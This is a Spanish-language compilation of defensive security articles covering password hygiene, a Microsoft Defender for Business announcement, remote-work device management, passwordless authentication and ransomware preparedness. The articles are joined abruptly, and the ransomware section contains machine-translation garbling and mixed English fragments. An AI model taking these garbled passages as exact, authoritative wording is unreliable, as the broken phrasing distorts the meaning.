Es cierto que la mayoría de los usuarios saben qué deben hacer para tener una buena contraseña, sin embargo en ocasiones cometemos algunos errores que ponen en riesgo nuestra privacidad.

Saben que no hay que usar una misma clave en varios sitios, que no hay que utilizar palabras o cifras que nos relacionen y sean fáciles de adivinar o saben que los ataques Phishing están más que presentes y son una de las principales amenazas.

 

Sin embargo, según un informe que ha realizado LastPass, el 65% de los usuarios reutiliza las contraseñas en todas las cuentas, el 44% indicó que había compartido contraseñas y datos confidenciales por Internet mientras tele trabajaba o el 68% aseguraba que no creaba claves más seguras para temas financieros. Todo esto hace que esas cuentas online estén desprotegidas y puedan estar expuestas a atacantes.

 

Por ello queremos mostrar qué no hay que hacer en relación a las contraseñas. Una serie de cuestiones importantes que de hecho la mayoría de usuarios no tiene en cuenta. El objetivo es crear contraseñas que sean realmente seguras y puedan cumplir su función de proteger las cuentas online. Si por ejemplo hablamos de Phishing, algo vital es reconocer SMS inseguros.

1. Hay que evitar reutilizar contraseñas

Lo primero y más importante que debemos mencionar es que nunca debemos utilizar una misma contraseña en más de un lugar. Hemos mencionado que el 65% de los usuarios las reutiliza, pero esto es un error importante que puede dejarnos desprotegidos.

 

Nuestro consejo es crear contraseñas que sean únicas para cada registro en Internet, para cada dispositivo o servicio que usemos. ¿Por qué es importante esto? Pongamos que tenemos la misma contraseña en la cuenta de Facebook, el correo electrónico y en un foro de Internet en el que nos registramos una vez para hacer una pregunta.

 

Ese foro ha sufrido una brecha de seguridad y todos los usuarios y claves han quedado expuestos. Ni siquiera nos hemos dado cuenta de ello ya que hace tiempo que no entramos en esa página. Ahora bien, un atacante puede probar esa contraseña para nuestra cuenta de Facebook y del correo electrónico. Al ser la misma, tendría acceso total.

2. Nunca usar palabras o dígitos que podamos recordar

También es esencial evitar utilizar palabras que sean fáciles de memorizar, como pueden ser nombres, apellidos o localidades. De la misma manera, debemos evitar números que tengan relación con nosotros, como por ejemplo el DNI, teléfono o fecha de nacimiento.

 

Esto será lo primero que probará un atacante. Podrá realizar diferentes combinaciones de este tipo de palabras o dígitos que pueden tener relación con el usuario. Es por ello que resulta imprescindible que usemos una mezcla de letras (tanto mayúsculas como minúsculas), números y otros símbolos especiales.

3. Cambiar las claves de vez en cuando

Otro error claro que cometen muchos usuarios es que no cambian las contraseñas. Se registran en una plataforma o servicio, como pueden ser redes sociales, foros de Internet, cuentas para comprar online… Crean una contraseña y la dejan tal cual durante años.

 

Puede ocurrir que en un momento dado esa cuenta o servicio tenga alguna vulnerabilidad y quede expuesta. Si no la cambiamos periódicamente podría estar en algún momento disponible para un atacante y ya sería demasiado tarde. Esto también nos ayudaría a evitar que roben las claves en Chrome.

4. No enviar datos sensibles por Internet sin seguridad

Hemos visto también que otro error típico que cometen muchos usuarios es el de enviar datos sensibles e incluso contraseñas a través de Internet. Por ejemplo con compañeros de trabajo, a través de plataformas que pueden no estar cifradas.

 

Debemos evitar hacer esto. Siempre que tengamos que enviar algún tipo de información confidencial hay que hacerlo desde aplicaciones y servicios que estén totalmente cifrados y sean seguros. Solo así nos garantizaremos que esa información no va a quedar expuesta en la red.

 

En definitiva, estas cuestiones son algunas de las más importantes para evitar problemas con las contraseñas en Internet. Debemos siempre proteger las claves, crearlas de forma seguras, que sean únicas y cambiarlas de vez en cuando para mantener la seguridad.

‎

‎La seguridad sigue siendo una de las mayores preocupaciones y responsabilidades más desafiantes que enfrentan las empresas hoy en día. Con un aumento de los ciberataques dirigidos a pequeñas y medianas empresas, las amenazas se están volviendo cada vez más automatizadas e indiscriminadas, y golpean a un ritmo significativamente mayor. En el último año, hemos visto un aumento del 300% en los ataques de ransomware con más del 50% llegando a las pequeñas empresas.‎¹‎. Para abordar esto, Microsoft está invirtiendo en soluciones de seguridad diseñadas a propósito para ayudar a protegerlos.‎

‎Nos complace presentar Microsoft Defender for Business, una nueva solución de seguridad para endpoints que llegará pronto en versión preliminar. Microsoft Defender for Business está especialmente diseñado para brindar seguridad de endpoints de nivel empresarial a empresas con hasta 300 empleados, en una solución que es fácil de usar y rentable.‎

‎Veamos Defender for Business con más detalle.‎

‎Eleve su seguridad con Microsoft Defender para empresas‎

‎Las principales amenazas de seguridad de hoy en día son la extorsión o la interrupción del ransomware. Su empresa necesita una mayor protección contra estas y otras amenazas a un precio asequible, para que pueda tener tranquilidad.‎

‎Defender for Business eleva la seguridad del antivirus tradicional a la protección de próxima generación, la detección y respuesta de endpoints, la gestión de amenazas y vulnerabilidades, y mucho más. Ofrece una configuración y gestión simplificadas con investigación y corrección inteligentes y automatizadas. Defender for Business le ayuda a protegerse contra las amenazas de ciberseguridad, incluidos el malware y el ransomware, en dispositivos Windows, macOS, iOS y Android.‎

‎Seguridad de endpoints de nivel empresarial‎

‎Estamos trayendo capacidades de nuestra solución Microsoft Defender for Endpoint líder en la industria y optimizándolas para empresas con hasta 300 empleados.‎‎Figura 1: Microsoft Defender for Business ofrece capacidades de nivel empresarial para ayudar a proteger su negocio.‎

‎Defender for Business incluirá las‎

‎ ‎

‎ siguientes capacidades:‎

• ‎Gestión de amenazas y vulnerabilidades:‎‎ le ayuda a priorizar y centrarse en las debilidades que representan el riesgo más urgente y el más alto para su negocio. Al descubrir, priorizar y corregir las vulnerabilidades y configuraciones erróneas del software, puede crear de forma proactiva una base segura para su entorno.‎
• ‎Reducción de la superficie de‎‎ ataque: reduce la superficie de ataque (lugares en los que su empresa es vulnerable a un ciberataque) en sus dispositivos y aplicaciones utilizando capacidades como la mitigación de ransomware, el control de aplicaciones, la protección web, la protección de red, el firewall de red y las reglas de reducción de superficie de ataque.‎

‎Figura 2: El panel de administración de amenazas y vulnerabilidades le ayuda a descubrir, priorizar y corregir de forma proactiva las vulnerabilidades y configuraciones erróneas del software.‎

• ‎Protección de próxima generación:‎‎ ayuda a prevenir y proteger contra las amenazas en su puerta principal con protección antimalware y antivirus, en sus dispositivos y en la nube.‎
• ‎Detección y respuesta‎‎ ‎‎de endpoints (EDR):‎‎ obtenga alertas de detección y respuesta basadas en el comportamiento que le permiten identificar amenazas persistentes y eliminarlas de su entorno. Las acciones de respuesta manual dentro de Defender for Business le permitirán tomar medidas sobre procesos y archivos, mientras que la respuesta en vivo lo pondrá en control directo de un dispositivo para ayudar a garantizar que esté remediado, protegido y listo para usar.‎
• ‎Investigación y corrección automatizadas:‎‎ ayuda a escalar sus operaciones de seguridad al examinar las alertas y tomar medidas inmediatas para resolver los ataques por usted. Al reducir el volumen de alertas y corregir las amenazas, Defender for Business le permite priorizar las tareas y centrarse en amenazas más sofisticadas.‎
• ‎API e integración -‎‎ Automatice los flujos de trabajo e integre los datos de seguridad en sus plataformas de seguridad y herramientas de informes existentes. Por ejemplo, puede extraer detecciones de Defender for Business en su herramienta de administración de eventos e información de seguridad.‎

‎Figura 3: El panel de detección y respuesta de endpoints ayuda a identificar las amenazas persistentes y eliminarlas de su entorno.‎

‎Fácil de usar, administrar y configurar‎

‎No se requieren conocimientos especializados en seguridad para instalar y administrar Defender for Business. Ofrece experiencias optimizadas que lo guían a la acción con recomendaciones e información sobre la seguridad de sus endpoints. Le permite proteger los puntos finales con menos complejidad y menos brechas que pueden ser explotadas por los malos actores.‎

‎El producto incluye una configuración de cliente simplificada con configuración controlada por asistente y políticas de seguridad recomendadas activadas de forma inmediata, lo que le permite proteger rápidamente los dispositivos. Los controles de gestión fáciles de usar y los conocimientos procesables le ayudan a ahorrar tiempo y priorizar las tareas.‎

‎Figura 4: La incorporación simplificada de dispositivos y los controles de administración fáciles de usar le permiten agregar clientes en unos pocos pasos simples con las políticas de seguridad recomendadas activadas de inmediato.‎

‎Rentable‎

‎Defender for Business está diseñado para ofrecer el máximo valor de seguridad a un precio que funcione para su negocio. La simplicidad de la misma le permite incorporar y administrar la seguridad de los endpoints con una baja sobrecarga operativa y menos carga para aprender conceptos complejos de ciberseguridad para proteger su negocio.‎

‎Defender for Business protege sus endpoints, ya sea que el correo electrónico y la productividad sean locales, Microsoft 365 u otra solución. Por lo tanto, hemos hecho que el modelo de licencia sea flexible y simple. Según la disponibilidad general, podrá comprar directamente en Microsoft y a través de los canales de Microsoft Partner Cloud Solution Provider (CSP). Estará disponible para su compra:‎

• ‎Como una oferta independiente, con un precio de $ 3 por usuario por mes.‎
• ‎Incluida como parte de Microsoft 365 Empresa Premium, nuestra solución integral de seguridad y productividad que reúne Microsoft Teams y Office 365 con las herramientas de seguridad esenciales para pequeñas y medianas empresas.‎

‎Integración de Microsoft 365 Lighthouse para socios de TI‎

‎Si es un socio de TI que presta servicios a pequeñas y medianas empresas, puede usar Microsoft 365 Lighthouse para proteger a sus clientes a escala. La integración de Microsoft 365 Lighthouse con Defender for Business le ofrece una vista de los incidentes de seguridad y las alertas de los clientes incorporados a Lighthouse. Las capacidades de administración adicionales para Defender for Business en Lighthouse también están en la hoja de ruta.‎

‎Figura 5: La cola de incidentes de seguridad dentro de Microsoft 365 Lighthouse ayuda a los socios de TI a identificar incidentes de seguridad y alertas en varios clientes.‎

‎

La movilidad de la fuerza laboral permite a los empleados mejorar la productividad y la moral, pero también representa nuevos desafíos de seguridad que las organizaciones deben superar.

Imagínese eliminar dos horas de viaje de su rutina diaria y trabajar en un entorno en el que se sienta más cómodo, utilizando el dispositivo que elija en el momento que usted prefiera. Tanto si eso implique algo tan extravagante como sacar su laptop mientras disfruta el sol en la playa, o en algún sitio más práctico como ir al espacio de cowork más cercano, la movilidad de la fuerza laboral es mucho más que una moda. Este es el futuro del trabajo en un mundo donde las oficinas con cubículos sin alma y los espacios de oficinas abiertos y ruidosos de antaño están desapareciendo rápidamente.

Impulsados por la tecnología moderna, los trabajadores móviles representan actualmente casi el 40 por ciento de la fuerza laboral a nivel mundial, y esto no hace más que aumentar. De hecho, muchas empresas se están volviendo completamente remotas, aprovechando el talento de todo el mundo para impulsar el crecimiento y reducir los costos operativos al eliminar para siempre los espacios físicos de oficina.

Es algo con lo que todos ganan: los empleados tienen más posibilidades de encontrar el equilibrio óptimo entre la vida laboral y personal, a la vez que sus empleadores se benefician al obtener mayor productividad, compromiso y lealtad. Vivimos en un mundo donde podemos trabajar en cualquier lugar y donde todos están conectados: ese es el futuro del “trabajo de oficina”.

Pero esto trae desafíos

Permitir el trabajo remoto implica mucho más que simplemente dar a todos sus empleados un smartphone o introducir una política para que traigan su propio dispositivo (BYOD). Requiere un cambio cultural fundamental, en el que los ejecutivos de negocios guíen con el ejemplo al adoptar la movilidad de la fuerza laboral para sí mismos, mientras que los administradores encuentran formas de mantener el control de sus activos digitales.

El temor de los líderes empresariales a perder el control es quizás el mayor inhibidor para implementar la movilidad de la fuerza laboral. Después de todo, el uso de dispositivos móviles en el entorno laboral amplía sustancialmente los flancos de ataque, brindando a los cibercriminales muchas oportunidades nuevas para explotar lo que a menudo es su activo más valioso: los datos. Agregar el trabajo remoto a la mezcla presenta otro problema más: las personas que se conectan a los recursos de la empresa mediante redes domésticas y públicas no seguras. Ah, ¿y sus costosos dispositivos móviles? Tienen la mala costumbre de perderse o ser robados.

Guiando el camino con soluciones de ciberseguridad escalables

La movilidad de la fuerza laboral se está convirtiendo rápidamente en un imperativo comercial. Y aunque indudablemente quedan algunos desafíos serios por solucionar, las ventajas superan con creces las desventajas. Dado que el número promedio de dispositivos conectados actualmente es de 3,5 por cada habitante de la Tierra (un número que aumenta exponencialmente), la seguridad de la información, al igual que cualquier otro proceso o sistema esencial, debe ser escalable, multicapa y administrarse centralmente.

Los empleados en la primera línea de la seguridad de la información

 Seamos realistas: muchos de nosotros somos culpables de desarrollar algunos hábitos de seguridad móvil bastante desastrosos. Más de una cuarta parte de nosotros ni siquiera bloqueamos las pantallas de nuestros smartphones, a pesar de que utilizamos los dispositivos móviles para todo, desde revisar nuestro correo electrónico hasta utilizar la banca personal. Si tomamos en cuenta la frecuencia con la que estos dispositivos se reportan como perdidos o robados, es fácil ver por qué representa un gran problema. La pérdida del valor del dispositivo no es nada en comparación con los hackers u otros terceros no autorizados que tendrán acceso a todas las cuentas y archivos conectados que estén almacenados en el dispositivo.

Cuando parte de su personal trabaja de forma remota y accede rutinariamente a los sistemas de su empresa, es imprescindible establecer reglas básicas. Por eso, implementar una política robusta para los casos donde se implemente el BYOD es un punto de partida esencial. Esta política debe indicar claramente cuáles dispositivos y aplicaciones están permitidos, qué medidas de seguridad deben implementarse y cómo pueden compartirse los datos de la empresa. Por ejemplo, probablemente no desee que los empleados que trabajan a distancia accedan a sus datos desde un iPhone liberado (jailbroken) o desde una computadora portátil antigua que tenga instalado un sistema operativo obsoleto.

Cómo recuperar el control de la seguridad en la administración de dispositivos móviles

Es esencial contar con una política que todos sus empleados conozcan bien, pero todos cometemos errores. Al igual que los líderes empresariales, sus trabajadores remotos no quieren vivir con el temor constante de que un solo error pueda dejar a toda la empresa abierta a una vulneración de datos.

Actualmente, los administradores de TI deben mantener la visibilidad de sus activos digitales ante una gran variedad en constante expansión de diferentes dispositivos y sistemas operativos. La administración de dispositivos móviles (MDM) es el complemento tecnológico de su política BYOD, ya que ayuda a hacer cumplir las reglas y permite que los administradores hagan un seguimiento de sus aplicaciones y datos. La MDM permite que los administradores monitoreen, administren y protejan los dispositivos que se utilizan para el trabajo, y concedan o revoquen derechos de acceso según sea necesario. Si, por ejemplo, un dispositivo se reporta como perdido o robado, se pueden borrar de forma remota todos los datos que contenga y revocar los derechos de acceso a cualquier cuenta en línea que haya en ese dispositivo.

Impedir las fugas mediante la prevención de pérdida de datos

Si bien el estereotipo trillado del hacker encapuchado que está al acecho en un sótano mirando las líneas de código que pasan por un monitor sigue reinando, la mayoría de los ciberdelincuentes en realidad no saben mucho sobre piratería informática. De hecho, el 90 por ciento de los ataques incluyen un elemento de ingeniería social. En vez de tratar de explotar las debilidades tecnológicas, están explotando la ignorancia humana con la esperanza de atraer a sus víctimas a tomar el curso de acción que desean.

A menudo, lo más fácil del mundo para un estafador es engañar a sus víctimas para que proporcionen su información confidencial a través de canales no seguros, especialmente si se hacen pasar por un colega o un representante de una empresa que conocen. Por ejemplo, si un empleado recibe un correo electrónico de alguien que se hace pasar por un agente de soporte técnico de un proveedor de servicios conocido que solicita acceso remoto, existe una buena posibilidad de que le haga caso. Si eso sucede, el atacante podría obtener acceso a toda la red comercial mediante una laptop comprometida perteneciente al empleado.

La prevención de la pérdida de datos (DLP) ofrece un enfoque basado en reglas que detecta y evita automáticamente que ciertos tipos de información, como la información de las tarjeta o las contraseñas de inicio de sesión, se envíen a través de canales no autorizados. Si la DLP se implementa a nivel de cuenta, también protege a los usuarios móviles cuando accedan a las cuentas de correo electrónico de la empresa y a cuentas de la empresa en redes sociales. También puede proteger a los usuarios de redes de colaboración en línea, herramientas de mensajería instantánea y de cualquier otra plataforma alojada en la nube.

La seguridad administrada en la nube como motor de innovación

Es hora de que los líderes empresariales dejen de ver la seguridad de la información como un mal necesario y comiencen a verla como un motor de ventaja competitiva, un habilitador de la innovación. La movilidad de la fuerza laboral es una parte esencial de esa capacidad de innovar. Al alojar las aplicaciones comerciales y los datos en la nube, los administradores de TI pueden disfrutar de una administración centralizada y obtener una visibilidad completa de sus activos digitales. La protección instantánea permite una menor dependencia en la seguridad de los endpoints, ya que todos los datos confidenciales se guardan en un centro de datos seguro en vez de almacenarse en dispositivos locales.

¿Una enorme ventaja de la nube? El software basado en Internet siempre está actualizado y, dado que los principales centros de datos del mundo tienen un suministro aparentemente ilimitado de recursos informáticos, también es sumamente escalable. Los líderes empresariales ya no tienen que depender únicamente de sus políticas BYOD ni de la seguridad de endpoints a nivel de dispositivo (aunque estas siguen siendo capas de protección esenciales). En vez de ello, pueden crear un ambiente informático definido por software y administrado de forma centralizada, en el que agregar nuevos usuarios es tan fácil como crear una cuenta y después permitir que los empleados que trabajan a distancia accedan a todo lo que necesitan a través de la web.

Este enfoque no solo es mucho mejor para la seguridad de la información, sino que también reduce o elimina por completo la necesidad de que los trabajadores remotos intercambien archivos manualmente por correo electrónico o mediante servicios de intercambio de archivos no seguros.

Un futuro agnóstico de su ubicación, sin riesgos

La movilidad laboral no debería ser una fuente de temores. No se trata de perder el control. Por el contrario, se trata de descentralizar su fuerza laboral y brindarle a su equipo la flexibilidad para trabajar de la manera que mejor se adapte a sus necesidades y, al mismo tiempo, aportar un enorme valor a toda la empresa. Al mismo tiempo, las soluciones modernas de seguridad de MDM y endpoints le permiten mantener un control total sobre la seguridad y el cumplimiento normativo de sus activos digitales. No importa dónde se encuentren sus trabajadores, siempre habrá una manera de mantener seguros sus datos empresariales.

‎Hoy en día, todas‎‎las organizaciones se enfrentan a desafíos relacionados con las contraseñas: campañas de phishing, pérdida de productividad y costos de administración de contraseñas, por nombrar solo algunos. Los riesgos ahora superan los beneficios cuando se trata de contraseñas. Incluso las contraseñas más seguras son fácilmente phishing y vulnerables a los ataques, como el rociado de contraseñas y el relleno de credenciales. A la gente tampoco‎‎le gustan:‎‎un tercio de las personas encuestadas‎‎ dicen que prefieren abandonar un sitio web que restablecer su contraseña. «No me quedan más contraseñas», se está convirtiendo en un sentimiento demasiado común. Es hora de buscar alternativas de contraseña que sean altamente seguras y convenientes. Estos son algunos recursos clave que pueden ayudarle a planificar e ‎‎implementar sin contraseña‎‎ para su organización.‎

‎1. Preparación de la organización para la autenticación sin contraseña‎

‎Hoy en día, la tecnología existe para hacer que los inicios de sesión sean más simples y seguros. Dos protocolos, WebAuthn y CTAP2, forman lo que‎‎se conoce como el estándar FIDO2, que permite a las organizaciones actualizar sus métodos de autenticación a opciones de ‎‎autenticación multifactor‎‎ respaldadas por hardware que no dependen en absoluto de las contraseñas. En su lugar, puede usar una clave física, una computadora portátil o una aplicación móvil como credencial. Dos preguntas que los clientes suelen hacer son ¿qué método elijo y cómo puedo empezar?‎

‎Recientemente publiqué una actualización de nuestro documento ‎‎técnico de protección sin contraseña,‎‎que desglosa los diferentes métodos de autenticación, estrategias de adopción y casos de uso. Esta guía le brinda un excelente punto de partida para pensar en su estrategia y una comprensión fundamental de cómo funciona la autenticación sin contraseña y los requisitos para cada una de las opciones.‎

‎10 razones para amar sin contraseña‎

‎Este año, mis colegas también crearon una serie de publicaciones de blog ‎‎10 razones para amar sin contraseña,‎‎que amplía muchos de los conceptos en el documento técnico.‎

1. ‎Credenciales basadas en FIDO2 desarrolladas‎‎ y adoptadas por la industria.‎
2. ‎Cumplimiento de los niveles de garantía de autenticación 2 y 3 (AAL2 y AAL3) del Instituto Nacional de Estándares y Tecnología (NIST).‎
3. ‎Autenticación biométrica almacenada localmente para identificar de forma única y segura a los usuarios.‎
4. ‎Inicios de sesión más rápidos con ‎‎Windows Hello‎‎ integrado en tu PC.‎
5. ‎Claves de seguridad portátiles en una variedad de factores de forma que funcionan en todas las plataformas.‎
6. ‎Ahorros del servicio de asistencia de las solicitudes de restablecimiento de contraseña.‎
7. ‎Inicios de sesión convenientes con la ‎‎aplicación Microsoft Authenticator‎‎ en su teléfono inteligente.‎
8. ‎Credenciales resistentes al phishing que reducen el riesgo de compromiso en más del 99,9 por ciento.‎
9. ‎Fácil configuración y recuperación de credenciales sin contraseña con ‎‎Temporary Access Pass.‎
10. ‎No se necesitan contraseñas para que los usuarios sean productivos y seguros.‎

‎2. Planificación de la implementación sin contraseña‎

‎Consulte la ‎‎guía de implementación de autenticación sin contraseña,‎‎que profundiza en cómo planificar el proyecto, implementar diferentes métodos y administrar políticas para la autenticación sin contraseña en función de lo que hemos aprendido de miles de implementaciones con clientes. Usa la ‎‎herramienta de recomendaciones sin contraseña‎‎ de la consola de administración de Microsoft para que te ayude a elegir el método adecuado para cada una de tus audiencias.‎

‎También puede obtener un recorrido práctico por las capacidades sin contraseña en Microsoft Azure Active Directory del video ‎‎Microsoft Mechanics‎‎ con Joy Chik, vicepresidente corporativo de identidad y acceso a la red, y el anfitrión Jeremy Chapman.‎

‎3. Aprender de los expertos‎

‎Los datos son útiles, pero a veces quieres escuchar a personas con experiencia. Únase a expertos en seguridad el ‎‎miércoles 13 de octubre de 2021, de 10:00 a.m. a 11:30 a.m., hora del Pacífico‎‎ para ‎‎ ‎‎que su futuro sin contraseña comience ahora,‎‎un evento digital donde aprenderá más sobre la autenticación sin contraseña y las mejores prácticas para adoptar una estrategia sin contraseña en toda la organización.‎

‎Aprenderás a:‎

• ‎Reduzca su riesgo de seguridad.‎‎ ‎‎Alex Simons,‎‎Vicepresidente Corporativo de Gestión de Programas de Identidad, ‎‎Alex Weinert,‎‎Director de Seguridad de Identidad, y ‎‎Pamela Dingle,‎‎Directora de Estándares de Identidad, cubrirán los desafíos de las contraseñas que los clientes han enfrentado y los beneficios de pasar a tecnologías sin contraseña. Los métodos sin contraseña, como la biometría, hacen que sea mucho más sencillo para las personas iniciar sesión, y mucho más difícil para los atacantes implementar una campaña de phishing exitosa. Los desarrolladores también tienen un papel en la reducción del riesgo de contraseñas, por lo que ‎‎Mike Hanley,‎‎director de seguridad de GitHub, compartirá cómo han adoptado la tecnología sin contraseña para el desarrollo de aplicaciones.‎
• ‎Implemente en su organización.‎‎ Si la autenticación sin contraseña en toda la organización suena demasiado buena para ser verdad, querrá escuchar a ‎‎Mark Russinovich,‎‎director de tecnología de Azure, y ‎‎Bret Arsenault,‎‎director de seguridad de Microsoft. En esta sesión conjunta, hablarán sobre las lecciones aprendidas de la adopción de una estrategia sin contraseña en Microsoft y la prueba de los límites sobre hasta qué punto la tecnología sin contraseña puede extenderse a su entorno híbrido.‎
• ‎Ayude a que sea una transición sin problemas para los usuarios.‎‎ La transición a una organización sin contraseña no se trata solo de la tecnología adecuada, también se trata de lograr que las personas adopten algo nuevo. ‎‎Charles Duhigg,‎‎autor del bestseller del New York Times ‎‎The Power of Habit‎‎ y ‎‎Smarter, Faster, Better‎‎ explicará por qué los humanos tienen tantos dificultades para obtener contraseñas correctas, y por qué deberíamos dejar de esperar que lo hagan. Explicará la psicología detrás de los hábitos de contraseña y analizará la historia para obtener información sobre cómo los líderes de ciberseguridad pueden ayudar a las personas a estar más seguras.‎
• ‎Dé el primer paso en su viaje de Zero Trust.‎‎ También aprenderá del anfitrión del evento, ‎‎Vasu Jakkal,‎‎Vicepresidente Corporativo de Seguridad, Cumplimiento e Identidad, sobre por qué la no tener contraseña es un componente necesario de una estrategia de seguridad ‎‎Zero Trust,‎‎ que comienza con la premisa de que debe verificar explícitamente cada solicitud de acceso. Hay costos financieros y humanos con los ataques cibernéticos, y ella aconseja sobre los pasos a seguir para fortalecer su seguridad digital.‎

‎Los ataques de ransomware continúan aumentando, utilizando técnicas que son cada vez más sofisticadas y dirigidas. Los líderes de seguridad y gestión de riesgos deben mirar más allá de los puntos finales para ayudar a proteger a la organización del ransomware.‎

‎Visión general‎

‎Desafíos clave‎

• ‎El protocolo de escritorio remoto, traiga su propia PC y la red privada virtual v‎‎ulnerabilities y misconfiguratio‎‎n se están convirtiendo en el punto de entrada más común para los atacantes.‎‎ ‎‎Esto se ha visto agravado por el crecimiento del trabajo remoto como resultado de la pandemia.‎
• ‎El ransomware está siendo operado cada vez más por humanos, en lugar de ser entregado como spam por los recursos tecnológicos.‎
• ‎El costo de la recuperación y el tiempo de inactividad resultante después de un ataque de ransomware, así como el daño a la reputación, pueden ser de 10 a 15 veces más que el rescate.‎

‎Recomendaciones‎

‎Los ‎‎ ‎‎líderes de seguridad y gestión de riesgos responsables de la seguridad de los endpoints y las redes deben centrarse en las tres etapas de un ataque de ransomware:‎

• ‎Prepárese para los ataques de ransomware mediante la‎‎construcción de una ‎‎ ‎‎estrategia‎‎de‎‎ preparación ‎‎ ‎‎previa‎‎ ‎‎al incidente, que incluye la copia de seguridad, la gestión de activos y la restricción de ‎‎los ‎‎privilegios‎‎de‎‎usuario. Determine‎‎ ‎‎ ‎‎ ‎‎si la organización está‎‎utimamente ‎‎preparada ‎‎para ‎‎pagar un rescate o ‎‎no.‎
• ‎Implemente medidas de detección‎‎ ‎‎ mediante la implementación de tecnologías de detección basadas en anomalías de comportamiento para identificar ataques de ransomware.‎
• ‎Cree ‎‎procedimientos de respuesta ‎‎posteriores a la‎‎ ‎‎ identificación capacitando al personal y ‎‎ ‎‎programando‎‎ ‎‎ ‎‎ ‎‎simulacros regulares.‎

‎Introducción‎

‎El ransomware sigue representando un riesgo significativo para las organizaciones. Los ataques recientes han evolucionado desde los ataques de autopropagación, como Wannacry y‎‎ ‎‎ NotPetya,‎‎hasta ejemplos más ‎‎dirigidos,‎^‎1,2‎‎ que atacan‎‎a ‎‎una organización, en lugar de ‎‎puntos finales‎‎ individuales. ‎‎ El impacto que estos ataques tienen en las organizaciones ha aumentado hasta el punto de que algunas organizaciones han quebrado,‎^‎3‎‎ ‎‎ y, en el caso de la sanidad, ‎‎se han puesto en riesgo ‎‎vidas.‎‎ ‎^{‎4 Los‎}‎ ‎‎ líderes de seguridad y gestión de riesgos (SRM) deben adaptarse a estos cambios y mirar más allá de los controles de seguridad de endpoints para protegerse contra el ransomware.‎‎Las campañas recientes de ransomware, como REvil y Ryuk, se han convertido en «ransomware‎‎operado por‎‎ humanos», donde el ataque está bajo‎‎ el ‎‎control de ‎‎un operador,‎‎ ‎‎ ‎‎en lugar ‎‎de ‎‎ ‎‎propagarse automáticamente. Tales ataques a menudo se aprovechan de debilidades de seguridad bien conocidas para obtener acceso. Por ejemplo, se cree que una serie de incidentes recientes de ransomware han comenzado con configuraciones de protocolo de escritorio remoto (RDP) mal configuradas o vulnerables. Las credenciales previamente comprometidas también se utilizan para obtener acceso a las cuentas.‎‎Una vez dentro, el atacante se moverá por la red, identificará los datos valiosos y evaluará los controles de seguridad utilizados, a menudo deshabilitando las herramientas ‎‎de protección de endpoints y ‎‎eliminando ‎‎las copias‎‎de‎‎ ‎‎seguridad.‎‎ Luego, cuando los datos han sido identificados, pueden ser cargados y luego utilizados para la extorsión (Doxing), o el ransomware se lanzará para cifrar los datos. El tiempo de permanencia típico entre la primera evidencia de actividad maliciosa y el despliegue de ransomware es de tres días.‎‎ ‎^‎5‎‎ ‎‎ El objetivo es maximizar la probabilidad de que se pague el rescate, a menudo incluyendo amenazas de hacer públicos los datos si el rescate no se paga rápidamente.‎‎La protección de las organizaciones contra estos ataques va más allá de la protección de endpoints y abarca muchas herramientas y controles de seguridad diferentes. La Figura 1 describe el ciclo de vida de la defensa del ransomware. Es importante examinar todas estas fases y asumir que un ataque será exitoso y planificar para responder en consecuencia.‎‎Figura 1: Ciclo de vida de la defensa del ransomware‎

‎Análisis‎

‎Construir‎‎ ‎‎ una ‎‎ ‎‎preparación preincidente‎‎ ‎‎ ‎‎ ‎‎S‎‎trateg‎‎y‎

‎Los líderes de SRM ‎‎ ‎‎deben trabajar con el principio de que un ataque de ransomware tendrá éxito ‎‎y ‎‎asegurarse de que la organización esté preparada para detectar lo antes posible y recuperarse lo más rápido posible.‎‎La primera y más común pregunta es: «¿Debería pagarse el rescate?» En última instancia, esto tiene que ser una decisión comercial. Debe hacerse a nivel de junta, con asesoramiento legal. Las agencias de aplicación de la ley recomiendan no pagar, porque fomenta la actividad delictiva continua. En algunos casos, el pago del rescate podría considerarse ilegal,‎^‎6‎‎ ‎‎ porque proporciona fondos para actividades delictivas.‎‎ ‎‎Incluso si se paga el rescate, los archivos cifrados a menudo son irrecuperables.‎‎Sin embargo, si una organización quiere estar lista para pagar, es importante establecer un proceso legal y de gobierno que incluya al CEO, la junta y el personal operativo clave. Configurar una billetera de criptomonedas puede llevar tiempo, por lo que, si el pago es una posibilidad, hacer los preparativos necesarios acelerará el tiempo para recuperarse. (Ver‎‎ ‎‎ ‎‎ ‎‎Cómo prevenir o mitigar los ataques de ransomware que exigen el pago en criptomoneda Blockchain‎‎.)‎‎Un buen proceso y estrategia de copia de seguridad es la principal línea de defensa contra el ransomware.‎‎ ‎‎Asegúrese de que la solución de copia de seguridad sea resistente a los ataques de ransomware y supervise continuamente el estado y la integridad de las‎‎ ‎‎ ‎‎copias de seguridad ‎‎(consulte ‎‎ ‎‎Cuadrante mágico para soluciones de copia de seguridad y recuperación de centros de datos).‎‎ En particular, la mayoría de los proveedores de copias de seguridad proporcionan un mecanismo para crear segundas copias inmutables de copias de seguridad o instantáneas inmutables.‎‎La recuperación va más allá de restaurar los datos. El ransomware bloqueará efectivamente una máquina con la nota de ransomware y restaurar las máquinas a un buen estado conocido puede ser más complejo que restaurar los datos. Tener las herramientas y los procesos en su lugar para restaurar los puntos finales a una imagen dorada puede acelerar el tiempo de recuperación. Algunas organizaciones recurren a dispositivos USB para ubicaciones remotas y en el extranjero. Gartner ocasionalmente ve que los clientes ni siquiera intentan limpiar o restaurar una máquina. En cambio, el evento de ransomware es una razón para actualizar su hardware. Cualquiera que sea el proceso, esto debe simularse regularmente para descubrir deficiencias.‎‎ ‎‎La conciencia de seguridad para los usuarios también es importante.‎‎ ‎‎Constantemente e informa‎‎a‎‎ los usuarios sobre los tipos‎‎ de ataques que se ven con alertas regulares y «boletines» de seguridad para reforzar la educación. Cree un conjunto simple de mensajes de seguridad que se repitan regularmente. ‎‎ ‎‎Un usuario alerta no solo tendrá menos probabilidades de caer en la ingeniería social, sino que puede actuar como una alerta temprana. Asegúrese de que los usuarios estén capacitados regularmente sobre cómo identificar‎‎correos electrónicos‎‎maliciosos, en ‎‎ ‎‎particular. Proporcione un mecanismo fácil para informar correos electrónicos sospechosos y refuerce con la confirmación de que el usuario ha hecho lo correcto.‎‎ ‎‎Considere las herramientas de automatización y respuesta de orquestación de seguridad centradas en el correo electrónico (SOAR), como M-SOAR, para automatizar y mejorar la respuesta a los ataques por correo electrónico (consulte la ‎‎ ‎‎Guía de mercado para la seguridad del correo electrónico).‎‎La higiene de la seguridad es fundamental para protegerse contra el ransomware «operado por humanos», y se requiere una visión holística de toda la organización. Los líderes de SRM deben incluir lo siguiente como parte de su estrategia para protegerse contra el ransomware:‎

